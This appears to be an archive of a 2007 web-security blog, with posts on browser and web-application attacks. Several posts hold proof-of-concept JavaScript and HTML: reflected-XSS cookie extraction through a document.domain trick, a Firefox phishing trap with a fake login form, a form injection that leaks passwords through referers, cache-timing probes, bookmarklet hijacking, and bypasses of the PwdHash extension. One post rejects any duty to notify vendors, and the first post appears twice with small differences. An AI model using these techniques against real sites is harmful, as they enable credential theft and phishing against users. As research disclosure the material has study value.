But persistent XSS attacks are not the only ones we see, and as such I would like to propose a method that has been used for conducting attacks before, but hasn't (to my knowledge) been used to mask a trail.

It turns out you can set the document.domain property to just 'com' if you have a .com domain.

Now, we can use this idea to remove all our attack logic from the site we are attacking with our reflected XSS attacks, and then extract data at will.

The easiest way to implement something like this would be to have two pages on your own .com domain. One to actually interface with the site, and one to use a meta redirect to the reflected XSS hole, and therefore strip the referer header.

And so, by doing this the site which you are abusing should have no clue as to where the attack originated from, except that it came from a .com domain.

The actual html/javascript implementation can be done in several ways, but the easiest is something similar to this:

attack.php :
<script>
document.domain = 'com';
function logic () {
    // extract data (e.g. cookies) from the attacked domain here
}
</script>
<iframe src="go.php" />

go.php :
<meta http-equiv="refresh" content="0;<script>document.domain='com';window.parent.logic();</script>">

In this we have the attack page with the logic on it, which sets the document.domain property when it is loaded. When the iframe gets redirected to the vulnerable page on the target, the target receives no idea what server redirected it there; it then sets the domain to .com and calls the logic() function from the parent window, which can then extract cookie data from the attacked domain.

Of course, if you run the same attack for long enough, or have a worm, then a client-side tracker could be implemented because, just as you can extract data from the target domain, they can extract data from your domain. Even given these limitations, though, it is a step that is unlikely to be taken by any admin, but should still be considered.

Furthermore, this should not be put on any site which hosts an actual site, because you have set up a system where any .com domain can break the cross-domain boundary - if another attacker found such an attack page on a live server, they could abuse it.

Old Post:

When most XSS attacks are conducted they simply inject all the attack logic right into the domain they are attacking. This of course gives out information such as the servers where cookies are getting logged, or any other attack logic, because it has been sent to the server - and since it is generally sent via GET, it is seen in all server logs. The only exception to this is when the attack logic is hosted on another site, and a script tag is injected. The problem with this is that it still reveals where the server with the attack logic was located, and if the admin reacts relatively quickly, then the attack logic can be captured from that server.

Sometimes this is unavoidable, as in the case of persistent XSS attacks, because they rely on having the attack logic located on the site so that users will be attacked with it, without having to go to another site.

But persistent XSS attacks are not the only ones we see, and as such I would like to propose a method that has been used for conducting attacks before, but hasn't (to my knowledge) been used to mask a trail.

As trev found out, it is possible for a site in the .com TLD to set their document.domain value to '.com.', and this allows it to share details with any site which also sets its document.domain value to '.com.'.

Now, we can use this idea to remove all our attack logic from the site we are attacking with our reflected XSS attacks, and then extract data at will.

The easiest way to implement something like this would be to have two pages on your own .com domain. One to actually interface with the site, and one to use a meta redirect to the reflected XSS hole, and therefore strip the referer header.

And so, by doing this the site which you are abusing should have no clue as to where the attack originated from, except that it came from a .com domain.

The actual html/javascript implementation can be done in several ways, but the easiest is something similar to this:

attack.php :
<script>
document.domain = 'com.';
function logic () {
    // extract data (e.g. cookies) from the attacked domain here
}
</script>
<iframe src="go.php" />

go.php :
<meta http-equiv="refresh" content="0;<script>document.domain='com.';window.parent.logic();</script>">

In this we have the attack page with the logic on it, which sets the document.domain property when it is loaded. When the iframe gets redirected to the vulnerable page on the target, the target receives no idea what server redirected it there; it then sets the domain to .com. and calls the logic() function from the parent window, which can then extract cookie data from the attacked domain.

Of course, if you run the same attack for long enough, or have a worm, then a client-side tracker could be implemented because, just as you can extract data from the target domain, they can extract data from your domain. Even given these limitations, though, it is a step that is unlikely to be taken by any admin, but should still be considered.

Furthermore this should not be put on any site which hosts an actual site because if another attacker found such an attack page on a live server, then they could easily conduct attacks similar to the one against MySpace described in trev's post.

[EDIT]: Sorry guys; false alarm. This doesn't fully work against IE and Opera because they treat and as separate domains, and so store cookies separately. I have figured out a way to overcome this, which I've posted here: so that anyone who has already seen this post will hopefully notice the second one.

Monday, March 26, 2007

Partially stopping sites breaking out of frames in Mozilla

I've been looking for ways to stop sites breaking out of frames for a long time now, and haven't been able to find anything.

And I still haven't been able to get anything working the way I'd like it to, but since I don't have much time these days I thought I'd throw this out there to see if anyone could figure something out. What I'm trying to do here is execute XSS attacks within iframes against sites which break out of iframes at the top of each page, but sadly I'm having almost no real success.

Using the idea that I used to implement this:, it is possible to stop sites breaking out of frames.

Using the following code:
<script>
function test(e) {
    window.setTimeout ("stop();", 1);
}

window.onbeforeunload = test;
</script>

<iframe src="" />

But while it is possible to stop from breaking out of an iframe, the moment we call the stop() function, the iframe also stops loading. So any XSS attacks after the frame breaking code will not be executed.

So as you can see I haven't been able to figure anything out which will stop the top window being changed, but not stop the iframe being loaded. Hopefully someone else will have more luck.

Tuesday, March 20, 2007

Trapping Mozilla For Phishing

I was looking at the onbeforeunload event handler today in the hopes of finding a way to attack/implement Martin Johns' paper SessionSafe: Implementing XSS Immune Session Handling (there's also some discussion about the paper here:,7607), and while I didn't find anything useful there, I did find a way to entrap, and therefore conduct phishing attacks against more aware Mozilla users.

Before delving into an explanation, here's the code which I'll explain:

<script>
function test(e) {
    window.setTimeout ("stop();", 1);
    window.setTimeout ("var test = document.getElementById ('test'); = 'block'; var test2 = document.getElementById ('test2'); = 'none';", 1);
}

window.onbeforeunload = test;
</script>

<div id="test2">Please go to</div>
<div style="display:none;" id="test">Please Enter your Login Details here:
<form action="">
Username: <input name="username">
Password: <input type="password" name="password">
</form>
</div>

Anyway; when using the onbeforeunload event handler it is still possible to access the window object, and therefore still possible to set time-outs.

In our time-outs, we can call the stop() function. When the stop() function is called, the location bar is not reset, and therefore will display the URL the user entered.

The next thing we would like to do would be to add some data to the page which makes it look like a phishing site. Sadly (or Luckily depending on your view point), when you call the document.write() function, the location bar is reset, and therefore we must use the DOM to make the existing page disappear, and add our new page.

Simple Enough.

One thing you should note though, is that there is a bug in Firefox where, if you enter, say, google, then press Ctrl+Enter, then go to another tab, and then return, the address bar will read "google" rather than "", but it's not a very likely scenario, so it should not be much cause for concern. Furthermore it is (to my knowledge) impossible to find out where the user is going, so I do not think there are many uses other than a phishing page like the example provided.

You also cannot force the user to go to a page programmatically, then stop that and have the URL changed; the URL is changed programmatically only when the browser successfully loads the page.

Oh, and AFAIK a slightly similar (in terms of effect, not implementation) vuln in IE is still unpatched:

P.S. This was tested on Firefox

Monday, February 26, 2007

stopgetpass.user.js - an interim solution

A couple of days ago I posted a method of breaking the RSCR Fix Mozilla implemented in Firefox. Today, I want to post an interim fix for the issue in the form of a Greasemonkey script:

for (i=0,c=document.forms.length;i<c;i++) {
    if (document.forms[i].method == 'get') {
        var password = false;
        for (l=0,k=document.forms[i].elements.length;l<k;l++) {
            if (document.forms[i].elements[l].type == 'password') {
                password = true;
            }
        }
        if (password == true) {
            document.forms[i].method = "post";
        }
    }
}
Essentially it just loops through all the forms on a page and sets the method on all forms with password fields to post. So while this will protect you from the attack I described, it will most likely break sites, so once a patch comes out of Mozilla (which I honestly hope it will, because otherwise all their efforts on the previous patch will be in vain), this will need to be removed.

Also, since this script is extracting method and type values from the DOM, it doesn't have to worry about case, obfuscation, etc, so it should not be vulnerable to any obfuscation of either the type or the method properties.

I'm sure you all know how to install Greasemonkey scripts, so I'm not going to bother explaining how to here, because for those who don't there's always Google.

P.S. 50th Post! Hurray, I've managed to actually stay interested in something for an extended period of time. I'm sure that some of the posts were completely uninteresting to people, but I hope that some of them weren't.

More Authenticated Redirect Abuse

A while ago I wrote two posts entitled Detecting Logged In Users and More Logged In User Detection via Authenticated Redirects.

Today I want to expand a bit more on how Authenticated redirects can be abused.

I want to talk about how you can abuse authenticated redirects which only redirect to certain domains (i.e. not yours), and not get stopped by extensions such as SafeHistory and SafeCache.

If we can redirect to any resource on a server it is quite reasonable to assume that we can redirect to either an image or a piece of javascript.

First of all, let's say our redirection script that exists on looks like this (ignore the fact that if it was an old version of PHP it would be vulnerable to response splitting, and the fact that parse_url doesn't validate URLs):



<?php
session_start();

if ($_SESSION['logged_in'] == true) {
    if ( is_string($_GET['r']) ) {
        $url_array = parse_url ($_GET['r']);
        if ($url_array['host'] == $_SERVER['SERVER_NAME']) {
            header ("Location: " . $_GET['r']);
            die();
        }
    }
}

header ("Location: http://" . $_SERVER['SERVER_NAME'] . "/index.php");
?>


Knowing that we can redirect to any resource on the server we can create something like the following:

<img src="" onload="alert('logged in');" onerror="alert('not logged in');" />

We could also redirect to javascript objects and overwrite the functions it calls, so that we know when it executes, but that's a whole lot more work.

Also, one other thing I failed to mention in either of the two previous posts, is that the technique I described in them can be used in any situation where something is loaded into the history, which includes iframes, popups, etc - but they are of course much less common.

Saturday, February 24, 2007

Fixing IE Content-Type Detection Issues: Output Filtering Instead Of Input Validation

[EDIT](25/02/07): It seems that this method doesn't completely work, so please read the comments to find more info, because otherwise this isn't going to do you any good.

There's been a bit of discussion over at about injecting Javascript into uploaded image files, and having IE detect the content type as text/html rather than the content-type sent by the server. For anyone who isn't familiar with the issue I recommend you read the following post: - not because it's the first mention of it, but because it's the best and most technical description I've seen.

Anyway; to take a leaf out of Sylvan von Stuppe's book, I'd like to recommend a way to do (the equivalent of) output filtering, rather than input validation to stop this issue.

First of all, let's take a look at why we would ever do input validation to stop XSS attacks. The only reason we have ever had to do input validation is to stop people inputting Javascript while still allowing them to input html.

In all other situations where we don't need to allow certain html, we can simply encode all output in the appropriate char set, and we're safe.

And there is no reason we would ever need to allow users to upload images which get interpreted as html files, and therefore served as such.

So, having established (at least in my view), that output filtering is the way to go; how would we go about doing this without altering the image?

Well, in this case it's easy enough; all we need to do is use a header that IE does respect: the Content-Disposition header. Possibly also a Content-Type header of application/octet-stream - or not, depending on how paranoid we are, and how much we want to (possibly) break things.

There are several ways to do this.

On Apache, the best solution is to use mod_headers to send the header for all files in a particular directory, and move all your uploads there.
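For example, something along these lines in the server config (a sketch only - the directory path is an illustration, and it assumes mod_headers is loaded):

```apache
# Force everything in the uploads directory to be treated as a download,
# so IE never content-sniffs it into text/html.
<Directory "/var/www/html/uploads">
    Header set Content-Disposition "attachment"
    Header set Content-Type "application/octet-stream"
</Directory>
```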

Microsoft provides an explanation of how you can achieve the same on IIS here:

You can of course also set PHP or any other server side language as the handler for all the files in a directory, and then use the header() (or similar) function to send the Content-Disposition header to the browser.

Of course, this might be annoying if a user does something like right click on an image and click view image, but this is a minor inconvenience IMO.

Breaking Firefox's RCSR Fix

In Firefox, the developers have done a lot of good in regards to helping prevent XSS and other attacks against the client; you can read the whole advisory here:

And while their fix for the RCSR issue is good, it's not perfect.

As everyone (including people commenting on mozilla's bug tracker) noticed, there is no real way to prevent this if an attacker can execute Javascript on the domain, because he can simply inject an iframe which has an src attribute set to the page which the user normally logs in on, and then simply change its contents to get the password.

Anyway; this fix attempts to solve the issue of an attacker being able to abuse the password manager if the attacker can inject html, but not Javascript. And so, that is the constraints within which we need to break the fix.

Let's assume we have a html injection issue in a page called in the GET parameter search; i.e. <img src=> would inject an image into the page.

What we can then do is inject a form into the page which looks like this:

<form action="" method="get">
    <input type="text" name="username" />
    <input type="password" name="password" />
    <input type="hidden" name="search" value="<img src='' />" />
    <input type="submit" value="Login" />
</form>

Then if we get the user to submit the form, then the referers sent to will have the username and password in them.

Of course, our form would have to have an input field which is a transparent image covering the whole browser window, which would submit the form for us (or something similar) so that the form actually gets submitted - but that issue has already been solved, and I wanted to keep the example clean.

On Disclosure

Firstly, just so that you understand my bias, my view on this topic is as follows:

  • I don't care how unethical disclosure is; if it interests me, and possibly others I'll post it.

  • I have no responsibility to give a vendor who has written insecure software time to fix their flaws - they've had time ever since they started writing it.

  • I also have no responsibility to contact them about any issues either.

  • I have no need to justify my position to anyone, and it won't change unless I get paid for it to change.

Anyway; Sid wrote a post on about how an ISP had backdoored its customers routers to make administration easier, entitled Accidental backdoor by ISP, which generated a bit of heat from some people, especially Cd-MaN.

He goes on about how Sid's post was unethical because it didn't help anyone - other than people who would want to attack the ISP - by mentioning which ISP it was, saying which subnet they owned and what the passwords were.

Now, arguing in cd-man's terms, there are people it helps. It helps anyone who wants to do some further investigation of the issue. It helps anyone who has an account with that ISP to secure themselves; I see no reason why it has to be disclosed in such a way that it would reach the majority of affected users - it's not our responsibility to fix other people's mistakes, and it never should be.

It also helps raise awareness of an issue which hasn't got much (if any) air time before. Because if you read any of the SpeedTouch manuals you will notice that they have a default remote administrator account, which most users never know about. Furthermore I'm willing to bet on the fact that most ISPs who use SpeedTouch routers will all have the same remote admin passwords.

And it really doesn't help anyone to say things like (
But this recent post on security team screams of the "I'm 1337, I can use nmap, I rooted 14716 computers" sentiment.

Because all it does is spread the FUD. If cd-man had bothered reading the post carefully he would have noticed that all I did was run an nmap scan to determine how many of the hosts in that subnet were running telnet. I think the number is higher than 14716 though, because my wireless network is dodgy and prone to cutting out halfway through something, and considering that that scan took hours (unattended), I wouldn't be surprised if it had missed whole chunks.

Oh and he also says:
How does disclosing this flaw with such detail (like subnet addresses and the ISP name) help anyone? The story would have been just as interesting would he left those details out.

I have no real argument here, but I see nothing interesting in someone posting that some ISP somewhere has used the same remote admin password on all its routers. But that's not exactly something we can argue about, since it's just like arguing which TV show is better.

Tuesday, February 20, 2007

Gotcha!: A PHP Oddity (with contrived security implications)

A while ago, I was looking over some code a friend of mine (who doesn't write much PHP) had written, which 'worked', but really shouldn't have.

It looked something like this:

if (strpos ($string, "needle") == "needle") {
    print "Is Valid";
}

And if you know PHP, you'll know that strpos always returns an integer or Boolean false (i.e. it should never return a string), so how the hell could this work?

Well, skipping my usual anecdote; it turns out that PHP casts strings to integers when doing comparisons between strings and integers (not the other way around, as I would have expected), and so "needle" got cast to an integer, which made it equal to 0. (And since strpos was returning 0, the above code worked.)

<Edit> (21/02/07): I realise that there should never be a double dollar vulnerability anywhere in your code, but mistakes are made; this is just a curiosity which I thought would interest people - clearly I was wrong. Also, while this uses a double dollar vuln, it is the only way I could come up with to get a string you control (rather than a decimal string) compared to an integer.

Now, for the very contrived security issue:


<?php
session_start();

$authenticated = 0;

if (isset($_SESSION['password'])) {
    if ($_SESSION['password'] == "password removed from backup") {
        $authenticated = 1;
    }
} elseif (isset ($_GET['password'])) {
    if ($$_GET['password'] == "password removed from backup") {
        $authenticated = 1;
    }
}

if ($authenticated == 1) {
    print "You Win!";
} else {
    print "You Fail!";
}
?>

You'll see the code above has a double dollar vulnerability, which would be unexploitable in this scenario because the password string is not stored in a variable, but rather is hard coded. But since, at this point, the variable $authenticated is equal to zero, we can set $_GET['password'] to "authenticated", so that $$_GET['password'] is equal to zero, and the comparison succeeds.

Note: The double dollar vuln is needed rather than just passing 0 to a normal comparison because all variables sent through http are strings.

Note2: It doesn't matter in what order the arguments are typed in the comparison, i.e. the following would also be vulnerable:
if ("password removed from backup" == $$_GET['password']) {
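For anyone who wants to play with the idea outside PHP, here's a rough JS model of the two ingredients (my own approximation of PHP 4/5's int == string comparison plus the variable-variable lookup - not PHP source, and the password string is a stand-in):

```javascript
// Rough model of PHP's loose int == string comparison: the string is
// cast to an integer, so any non-numeric string compares equal to 0.
function phpLooseEq(intVal, strVal) {
  var n = parseInt(strVal, 10);
  return intVal === (isNaN(n) ? 0 : n);
}

// Model of $$_GET['password']: look up a variable whose *name* the
// attacker supplies, using an object as the variable table.
var vars = { authenticated: 0 };
function doubleDollar(name) { return vars[name]; }

// Attacker sends ?password=authenticated, so the comparison becomes
// 0 == "the real password", which the cast makes true:
console.log(phpLooseEq(doubleDollar("authenticated"), "some secret password"));
// → true
```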

Monday, February 19, 2007

You call that a game? This is a......

Firstly; sorry for the lack of updates, I've really been too busy to come up with anything interesting to write, and haven't found anything particularly interesting to write about.

Now, onto the bad title. I found the following "game" on digg: and decided to see exactly how effective the sha-1 rainbow tables I had found were.

Now, the first thing I tried was using since you can crack up to 50 hashes at a time (50 because that is the limit per IP). So I ran the list of hashes against (using a proxy for the second 50) and got quite good results; I think that at least 50 (I wasn't counting) of the hashes I cracked came from

After this I ran the remaining hashes against and and was able to crack a further 20 hashes.

I tried running the remaining 30 against, but got no results (which doesn't really say anything since the only ones left were the ones no-one else could get), and I got interrupted while running the hashes against, which during the time I was away went down, and I don't have an account on (if anyone does, I'd really appreciate it if you got in contact with me), and seems to be down for maintenance.

So while this little anecdote can't testify to the usefulness of any single site (other than, it clearly illustrates that it doesn't matter what hashing algorithm you use if you do not salt the data first, and your users use poor passwords. But we already knew that, so *shrug*.

Tuesday, February 13, 2007

Attacking Aspect Security's PDF UXSS Filter

While this is not really much of an issue any more because Adobe have released an update and there isn't really much to say, I'd like to revisit it for a moment.

There were a lot of people (myself included) who had considered the PDF UXSS issue unsolvable at the server-side level; how wrong we were:

I have no real analysis of it because, as far as I can tell, it's bullet proof - or at least it would be if browser security didn't have fist-sized holes in it. From a black box perspective, where there is no information leakage, that fix is great.

But sadly, there are ways to simply obtain the data. Using an Anti-DNS Pinning attack, it should not be a problem to simply send a request to that IP with the appropriate Host header, etc, and then parse out the link and simply redirect the user. I'm not going to bother providing any code, because there's really nothing new here, just another misfortune.

So a very good idea, is practically useless, simply because the rest of our security model is shot to bits.

A Better Web Cache Timing Attack

I've been thinking on whether I should bother writing an actual paper on this or not, but when I found that Princeton had already written a pretty decent paper on Web Cache timing attacks back in 2000, which you can find here: I decided against it.

If you read the paper you will see that the attack relies on the use of two images to determine whether they are cached: you get the timing for one image, then load a page which caches both images, and then get the timing for the second image. If there is a dramatic difference in loading times, then the first image had not been cached, and the user had therefore not visited the page; whereas if there was no significant difference, then the image was already cached, and therefore the page had been viewed before.

Now, this suffers from the fact that you actually need two images which are ONLY displayed together, because otherwise your results will be erroneous; and not only that, it requires that the images are approximately the same size, so that your inferences about cache state are accurate.

A much better solution is to be able to determine the time it takes to retrieve a cached and non-cached version of an image by supplying request parameters, e.g.

The first thing we do is generate a random request string and make a request for that image; we now have the approximate time it should take to get the image when it is not cached. We then make a second request to see how long the image takes to load when it is cached - and by generating a large number of query strings to test, we can get more accurate averages.

We then make a request for the image without any request parameters and see which averaged value it is closer to, and then determine cache state.
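The final decision step is just a nearest-average comparison, something like this (a sketch with hypothetical millisecond values; gathering the timings themselves would happen in the browser):

```javascript
// Given the averaged uncached time, the averaged cached time, and the
// measured time for the real (parameter-less) image request, report
// which cache state the measurement is closer to.
function cacheState(uncachedAvg, cachedAvg, measured) {
  var dUncached = Math.abs(measured - uncachedAvg);
  var dCached = Math.abs(measured - cachedAvg);
  return dCached <= dUncached ? "cached" : "not cached";
}

console.log(cacheState(300, 20, 35)); // → "cached"
```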

This benefits from the fact that not only does there need to be just one image - so we can find a page with a large photo or similar to give us a greater margin for error - but we also do not need to find a page with two images of equal size, because we will always be making requests for the same image.

Sadly not quite as effective as the attack against the SafeCache extension, but that's why it's a timing attack I guess, :)

Saturday, February 10, 2007

Attacking the SafeCache Firefox Extension

Well, SudoLabs got taken down since almost no-one was using it, so now troopa is using the domain for his blog, so I'm moving all my content here:

The SafeCache extension is yet another good idea in browser security to come out of Stanford University. Essentially it extends the browser same origin policy to the browser cache to defend against cache timing attacks. You can find more info about it here:

Now while I have not looked at the source code to the extension, I have devised a method for not only being able to perform timing attacks, but to be able to directly determine whether or not the objects you are trying to find info about are in the cache or not.

It seems that if you create an iframe element where the src attribute points to the resource whose cache state you want to query, then the onload event will fire only if the item is not in any cache.

To test this either login to Gmail, or go to and then create a page like the following:

<script>
var time = new Date();
var t1 = time.getTime();

function loaded() {
    var time = new Date();
    var t2 = time.getTime();
    alert(t2 - t1); // only fires if the iframe src was not already cached
}
</script>
<iframe src="" onload="loaded()"></iframe>

And you will notice that the onload event does not fire. Then, if you press Ctrl+Shift+Del, delete the cache, and visit the html page you just created again, the onload event will fire.

If you refresh the page, the onload event will not fire a second time, because the resource is back in the cache.

So while it stops standard cache timing attacks, it does not stop attacks against itself.

Anatomy of a Worm by Kyran

It's about the worm I wrote targeting, aptly named "gaiaworm". This is the third version of the worm and the first time I've ever really written a paper.

It's an interesting paper that details what he has coined a "Pseudo-Reflective" worm: while it uses a reflected XSS vector, it spreads through a persistent on-site mechanism - in this case the PM system.

Solving Password Brute Force And Lockout Issues

Locking users out of sites by exhausting a limited number of login attempts has always been a pet peeve of mine - not only because you can sometimes forget which particular password you used, but also because it becomes quite easy to DoS someone's account simply by triggering failed login attempts. I thought most websites had done away with this; not so Sudo Labs, it seems. Now, I'm not about to take responsibility for this, since it isn't our code base and we didn't even think it would be set up this way, but when I was talking to Kyran I found out that (much to our chagrin) he had gotten locked out.

Which got me thinking: why can't we have an override code to allow people to log in even when their account is being attacked? As I see it, there's no reason we can't; we can even re-use existing code to achieve it.

These days when you want to sign up for most sites you get sent an email with an activation code/link which you have to use so that your account is activated, and we know you own the account.

Now, if we were to keep the current lockout system but give users the option to request a special login code, normal functionality would keep working most of the time, and when a user's account is being DoS-ed they would not be locked out, because they can simply request a login code and use it to bypass the lockout. Of course, this cannot be used by email vendors, who are already the crux of most of our identification, but for everyone else it's not much of an extra burden.

Bookmarklets are NOT secure

Jungsonn wrote a post entitled "Defeating Phishers" where he wrote about how one could distribute risk across two servers, and essentially have one site where XSS vulnerabilities are unimportant, and one which would need to be audited heavily. He also recommended using Bookmarklets because "Bookmarklets are actually pretty secure things, no software or website can access them.".

Personally, I disagree with both of those statements. Firstly, if you find an XSS hole in the main domain, you can easily make the page say that they've changed their practices; sure, it would look a little odd, but the amount of user education required to make this attack impractical would be enough to solve the whole phishing issue, not just this one.

But more importantly, I want to debunk the myth that bookmarklets are secure. Leaving aside the fact that trojans and the like can easily alter them because they have access to the file system, bookmarklets are still insecure; they are exactly as insecure as the page they are clicked on is untrustworthy.

For example, let's take the bookmarklet Jungsonn posted:
javascript:QX=document.getSelection();if(!QX){void(QX=prompt('Type your firstname',''))};if(QX)document.location=''

It would seem fairly secure, except that with Javascript engines as permissive as they are, we can subvert it. Here's how:
<script>
function changeHandler(prop, oldval, newval) {
    if (newval == '') {  // the bookmarklet's hard-coded destination (URL elided)
        return '';       // rewrite it to our phishing page (URL elided)
    } else {
        return newval;
    }
}
window.watch('location', changeHandler);
</script>

If the bookmarklet is clicked on a page with that code on it - say a phishing page at or a legitimate page on the domain if it has an XSS hole in it - then we can easily send the user to a phishing page, even though the value is hard-coded in the bookmarklet.

Of course, the bookmarklet can try to detect and remove such things, but it's a technological battle that will be fought on a bookmarklet-by-bookmarklet basis; which is essentially where security generally fails - custom code. The other scenario is that we find a secure method of redirecting users, but even if we do, we're not going to get everyone to use it; so I'd rather not recommend bookmarklets as a security measure - just tell users to create a simple bookmark to the site.

Or we could try to educate users to only click the bookmarklet from a blank page, but that's another area where security generally fails - user education.

Friday, February 09, 2007 - XSS Archive w/ Mirror

One thing I've long thought web app sec was missing that network sec had is a defacement/attack archive with a mirror - something like Zone-H, but for XSS exploits - especially after Acunetix decided to pretend that the flaws that had been found and posted on had never existed.

Well, today I found a site called which contains an XSS attack archive with a mirror. It greatly resembles Zone-H, but that can only be good, since no-one has to figure out a new interface.

Personally, I think we should give them our support: without any way to verify vulnerability claims, vendors will keep sweeping things under the rug and lying their way through everything, and an unbiased 3rd party is probably a great way to do that verification.

Sunday, February 04, 2007

This Week in Sec

Excuse the bad pun of a title, but I couldn't come up with anything better. Anyway, as with my last posting of links, it's not exactly a week; it's probably closer to "the interesting links I've found since I last posted a post of links". So here goes:

.aware alpha zine
The people over at have released an ezine; it has nothing to do with web apps, but it's still quite good. To quote the front page:
Hello and welcome to the first .aware eZine ever to exist on planet
earth. Basically, with all the h0no wannabes out there and phrack down,
I thought there ought to be a little bit more actual infotainment spread
into cyperspace. This way, maybe not all of us will be driven into
criminal insanity by paranoid hallucinations.

Enjoy the zine.

PS: We're sorry for causing all that cancer.

CAPTCHA Recognition via Averaging
This article describes how certain types of captchas (such as the ones used by a German online-banking site) can be automatically recognized by software. The attack does not recognize each captcha individually, but exploits a design error that allows an attacker to average multiple captchas containing the same information.
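The averaging trick itself is simple; here is a rough sketch, assuming the captchas have already been aligned and converted to greyscale pixel grids (the function name and representation are my own, not from the article):

```javascript
// Average several aligned greyscale captcha images (2D arrays of
// 0-255 values) pixel by pixel. Random noise that differs between
// samples washes out, while the constant digits reinforce each other.
function averageCaptchas(images) {
  var h = images[0].length;
  var w = images[0][0].length;
  var out = [];
  for (var y = 0; y < h; y++) {
    out.push([]);
    for (var x = 0; x < w; x++) {
      var sum = 0;
      for (var i = 0; i < images.length; i++) sum += images[i][y][x];
      out[y].push(sum / images.length);
    }
  }
  return out;
}
```

The design error the article exploits is that the same information is served under many differently-noised captchas, which is exactly what makes averaging possible.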

This was submitted to bugtraq, so you can find the bit of discussion that went on about it here: (note: this isn't just the single post; there are replies) and, because the thread got split between two months, here:

Vista Speech Command Exposes Remote Exploit
Essentially, some people found out that Vista doesn't attempt any cancellation of audio travelling from the speakers to the microphone, so any commands your computer plays through the speakers will be picked up and, if you have voice commands activated, executed.

I didn't break it!
Matt Blaze posted a very good entry about how (crypto) researchers are often described as having cracked codes, and how this taints research. I think this also applies to security research just as much, except for the fact that generally most people say security researchers "broke" something rather than they "cracked" something. He also has another interesting post entitled James Randi owes me a million dollars which I think people should also read.

And in case you somehow managed to miss it:
Sudo Labs is up!
Sudo Labs is an attempt to create an R&D-oriented forum where people can discuss any security ideas they have, in an environment which focuses on new ideas and techniques rather than explaining old ones. Having said that, those who aren't experts are also welcome; they're just asked to contribute, rather than clog the board with questions about known topics - there are many other boards which will teach you about security.

So that about wraps it up for interesting things I've found over the past week in regards to security, hopefully next time I'll have a better title, but I somehow doubt it.

Saturday, February 03, 2007

Samy Sued and Sentenced

Well, today we found out that the creator of the MySpace Samy worm has been sued by MySpace and sentenced:,myspace-superworm-creator-sentenced-to-probation-community-service.aspx

I'm honestly lost for words, that comes as quite a shock to me.

Now clearly he has done something wrong (and now it seems - illegal), but I don't think anyone expected this. Especially considering that while it did spread, it was completely non-malicious.

For the moment I'm safe since I've never attacked MySpace, but frankly, I'm just worried that they're going to come after people who have disclosed vulnerabilities in MySpace next.

Friday, February 02, 2007

Attacking the PwdHash Firefox Extension

Well, SudoLabs got taken down since almost no-one was using it, so now troopa is using the domain for his blog, so I'm moving all the content here:

A while ago I saw an interesting paper/implementation of a way to hash and salt user passwords by domain, so that (I assume) phishing attacks cannot steal users' passwords, because they are salted with the phishing domain rather than the targeted domain. You can find more info here:

If you read their paper, and the comments in the extension you'll see that they've got pretty much anything you can think of covered. One of the things they haven't been able to stop has been Flash based sniffers, because Javascript extensions don't have any control over 3rd party plugins.

But I have come up with a way to circumvent certain protections and possibly another attack.

To protect against context-switching attacks, once a user presses the @@ combination or the F2 key in a password field, the context cannot be changed without alerting the user until at least 5 additional characters have been typed.

This is decent protection, since it means you cannot steal the first 5 letters of a user's password, and since user passwords aren't particularly long, those first 5 characters are vitally important.

But the extension developers made a few fatal mistakes: they allow the page to receive the event of a user pressing the @ key (though not the F2 key), and they check how many characters are in the text box by checking the DOM - and since we are not restricted from changing the DOM, we can easily change the contents of the password box.

So what we can do is: detect two presses of the @ key, quickly change the value of the password box to "testing" or some similar string longer than 5 characters, set the focus to another element, then change the value of the password box back to two @ signs and put the user back in place. You get a little flicker, but most users will discount that. Anyway, here's an example:

<script language="javascript">

var text = document.createElement('div');
var last = null;

document.onkeypress = function (e) {
    var key = String.fromCharCode(e.charCode);
    if (last == '@' && key == '@') {
        var pb = document.getElementById("pass");
        pb.value = '@@testing';
        window.setTimeout("context_switch();", 1);
    }
    text.innerHTML = text.innerHTML + key;
    last = key;
}

function context_switch() {
    var pb = document.getElementById("pass");
    var tb = document.getElementById("text");
    tb.focus();  // switch focus away from the password box
    pb.value = '@@';
    pb.focus();  // and put the user back in place
}
</script>
<input id=pass type=password>
<input id=text type=password style=visibility:hidden>

Another thing Firefox allows you to do is create events which can be sent to the DOM, and for some reason these do not go through extensions. This is a double-edged sword: while we cannot simulate a user typing to an extension, the extension is also not aware of us sending events to the DOM.

And since the extension developers are, in a sense, using the password box to store the password (the password box contains @@ABCDEFGH... etc., which gets mapped back to the text you entered when the extension computes the hash), we can insert text into the password box and have it included in the hash. Since we can inject the letters A, B, C, D, etc., we can conduct an attack where we know that, say, each letter is repeated 3 times (by detecting keyboard events and then sending two copies of each event to the textbox again). This isn't a real attack at the moment, since I haven't looked at the hashing algorithm, but being able to repeat any number of letters any number of times should make any cryptanalysis easier.

Also, if we think we can get the user to keep entering their password over and over again, we can just replace the textbox content with, say, @@AAAAA or @@BBBBB or @@CCCCC, so that we get a hash of a single character repeated, and then use a simple 256-value lookup table.

Ok, I figured out a way to defeat the fact that we can't detect the F2 key being pressed.

It does have some false positives, but this is just to show that an attack is still possible.

Anyway, what we do is detect when we get sent an A, then check that the length of the text in the password box is > 0; if it is, we send 4 As to the password box, swap the context, and record some data - and all we need then is a 256-value lookup table. Anyway, here's the PoC:

<script language="javascript">

var text = document.createElement('div');

var enc0 = null;
var enc1 = null;

document.onkeypress = function (e) {
    var key = String.fromCharCode(e.charCode);
    if (key == 'A') {
        window.setTimeout("test_n_send();", 1);
    }
    text.innerHTML = text.innerHTML + key;
}

function test_n_send() {
    var pb = document.getElementById("pass");
    var tb = document.getElementById("text");
    if (pb.value.length > 0) {
        enc0 = pb.value;
        send4A();    // inject four fake 'A' keypresses
        tb.focus();  // swap the context so the extension hashes the box
        enc1 = pb.value;

        var enc0b = document.getElementById("enc0");
        enc0b.value = enc0;

        var enc1b = document.getElementById("enc1");
        enc1b.value = enc1;
    }
}

function send4A() {
    var pb = document.getElementById("pass");
    var i;

    for (i = 0; i < 4; i++) {
        var evt = document.createEvent("KeyboardEvent");
        evt.initKeyEvent(
            "keypress", // in DOMString typeArg,
            false,      // in boolean canBubbleArg,
            false,      // in boolean cancelableArg,
            null,       // in nsIDOMAbstractView viewArg, may be null
            false,      // in boolean ctrlKeyArg,
            false,      // in boolean altKeyArg,
            false,      // in boolean shiftKeyArg,
            false,      // in boolean metaKeyArg,
            0,          // in unsigned long keyCodeArg,
            65);        // in unsigned long charCodeArg ('A')
        pb.dispatchEvent(evt);
    }
}
</script>
<input id=pass type=password>
<input id=text type=password style=visibility:hidden><br />
<input id=enc0><br />
<input id=enc1><br />

Thursday, February 01, 2007

HTTP Response Splitting Attacks Without Proxies

